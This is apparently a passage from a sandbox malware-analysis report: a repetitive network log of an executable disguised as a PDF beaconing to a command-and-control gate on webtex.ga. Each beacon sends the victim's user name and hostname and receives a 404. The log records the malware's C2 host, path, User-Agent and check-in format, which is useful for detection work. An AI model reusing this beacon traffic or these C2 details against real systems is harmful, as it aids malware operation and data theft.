                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:09.390839100 CET4860OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:09.432904005 CET4861INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:26 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    254192.168.2.34999947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:09.662563086 CET4862OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:09.679286003 CET4863OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:09.725847006 CET4863INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:26 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    255192.168.2.35000047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:09.951987982 CET4869OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:09.968727112 CET4869OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:10.009026051 CET4872INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:27 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    256192.168.2.35000147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:10.243520021 CET4876OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:10.260274887 CET4877OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:10.302791119 CET4877INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:27 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    257192.168.2.35000247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:10.507911921 CET4878OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:10.524560928 CET4878OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:10.569188118 CET4878INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:27 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    258192.168.2.35000347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:10.788542032 CET4879OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:10.805351019 CET4880OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:10.861552000 CET4880INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:28 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    259192.168.2.35000447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:11.075915098 CET4881OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:11.092772961 CET4881OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:11.206682920 CET4881INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:28 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    26192.168.2.34973947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:40.172331095 CET120OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:40.188839912 CET123OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:40.234574080 CET123INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:57 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    260192.168.2.35000547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:11.442584038 CET4882OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:11.459582090 CET4882OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:11.511030912 CET4883INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:28 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    261192.168.2.35000647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:11.722306967 CET4883OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:11.739063978 CET4884OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:11.775321007 CET4884INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:29 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    262192.168.2.35000747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:11.992415905 CET4885OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:12.009205103 CET4885OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:12.055450916 CET4885INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:29 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    263192.168.2.35000847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:12.296638966 CET4886OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:12.313354015 CET4886OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:12.396986961 CET4887INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:29 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    264192.168.2.35000947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:12.634506941 CET4887OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:12.652398109 CET4888OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:12.694489002 CET4888INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:29 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    265192.168.2.35001047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:12.913599968 CET4889OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:12.930231094 CET4889OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:12.980752945 CET4889INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:30 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    266192.168.2.35001147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:13.192842960 CET4890OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:13.209367990 CET4890OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:13.277596951 CET4891INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:30 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    267192.168.2.35001247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:13.509327888 CET4892OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:13.525840998 CET4892OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:13.581255913 CET4892INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:30 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    268192.168.2.35001347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:13.827815056 CET4893OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:13.844646931 CET4893OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:13.898849010 CET4893INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:31 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    269192.168.2.35001447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:14.124274015 CET4894OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:14.141046047 CET4895OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:14.184983015 CET4895INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:31 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    27192.168.2.34974047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:40.464315891 CET128OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:40.480942011 CET128OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:40.524907112 CET129INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:57 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    270192.168.2.35001547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:14.405318022 CET4896OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:14.421847105 CET4896OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
